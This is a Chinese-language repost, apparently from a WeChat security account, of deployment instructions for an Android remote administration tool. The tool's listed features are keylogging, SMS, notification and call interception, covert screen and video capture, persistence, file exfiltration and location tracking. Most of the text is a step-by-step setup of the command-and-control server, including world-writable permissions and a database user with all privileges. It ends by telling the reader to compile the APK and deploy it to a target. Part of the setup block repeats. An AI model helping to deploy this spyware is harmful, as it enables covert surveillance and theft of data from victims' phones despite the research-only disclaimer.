权限绕过(Android 12 以下)、键盘记录器、通知监听器、短信监听器、电话录音、图像捕捉和截图、视频录制、持久性、读取和写入联系人、列出已安装的应用程序、下载和上传文件、获取设备位置
/var/www/html/
并安装依赖项mv moukthar/Server/* /var/www/html/
cd /var/www/html/c2-server
composer install
cd /var/www/html/web-socket/
composer install
cd /var/www
chown -R www-data:www-data .
chmod -R 777 .
- 默认凭据是用户名:
android
和密码:android
- 创建新的 SQL 用户
CREATE USER 'android'@'localhost' IDENTIFIED BY 'your-password';
GRANT ALL PRIVILEGES ON *.* TO 'android'@'localhost';
FLUSH PRIVILEGES;
c2-server/.env
在和中设置数据库凭据web-socket/.env
- 执行
database.sql
- 在 Linux 中启动 Web 套接字服务器或部署为服务
php Server/web-socket/App.php
# OR
sudo mv Server/websocket.service /etc/systemd/system/
sudo systemctl daemon-reload
sudo systemctl enable websocket.service
sudo systemctl start websocket.service
c2-server/.env
在和中设置数据库凭据web-socket/.env
- 执行
database.sql
- 在 Linux 中启动 Web 套接字服务器或部署为服务
php Server/web-socket/App.php
# OR
sudo mv Server/websocket.service /etc/systemd/system/
sudo systemctl daemon-reload
sudo systemctl enable websocket.service
sudo systemctl start websocket.service
-
调整 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html/c2-server
DirectoryIndex app.php
Options -Indexes
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-
调整 /etc/apache2/apache2.conf
Comment this section
#<Directory />
# Options FollowSymLinks
# AllowOverride None
# Require all denied
#</Directory>
Add this
<Directory /var/www/html/c2-server>
Options -Indexes
DirectoryIndex app.php
AllowOverride All
Require all granted
</Directory>
-
增加 php 文件上传最大大小 /etc/php/*.*/apache2/php.ini
; Increase size to permit large file uploads from client
upload_max_filesize = 128M
; Set post_max_size to upload_max_filesize + 1
post_max_size = 129M
-
c2-server/src/View/home.php
在 <script>标签中设置 Web 套接字服务器地址c2-server/src/View/features/files.php
const ws = new WebSocket('ws://IP_ADDRESS:8080');
-
使用以下命令重新启动 apache
sudo a2enmod rewrite && sudo service apache2 restart
-
在客户端设置C2服务器和Web套接字服务器地址 functionality/Utils.java
public static final String C2_SERVER = "http://localhost";
public static final String WEB_SOCKET_SERVER = "ws://localhost:8080";
- 使用 Android Studio 编译 APK 并部署到目标
github:
原文始发于微信公众号(鹏组安全):Android远程管理工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论